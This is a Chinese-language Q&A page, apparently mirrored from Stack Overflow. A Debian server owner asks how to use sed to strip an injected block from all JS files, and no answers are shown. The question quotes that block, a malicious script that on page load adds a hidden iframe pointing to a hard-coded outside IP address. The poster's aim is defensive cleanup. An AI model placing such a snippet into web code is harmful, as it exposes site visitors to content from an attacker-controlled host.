从所有JS文件中删除代码块

时间:2018-08-10 13:10:17

标签: jquery linux

我想从我的debian服务器上的所有JS文件中删除此块。它是一个恶意代码。我不确定是否可以使用SED。有人可以帮忙吗?

if (typeof window.jsuekzis == 'undefined') {
window.jsuekzis = 1;
window.onload = function() {
    var iframe = document.createElement('iframe');
    iframe.style.display = "none";
    iframe.src = "http://155.94.75.92/iframe.html";
    document.body.appendChild(iframe);
};

}

0 个答案:

没有答案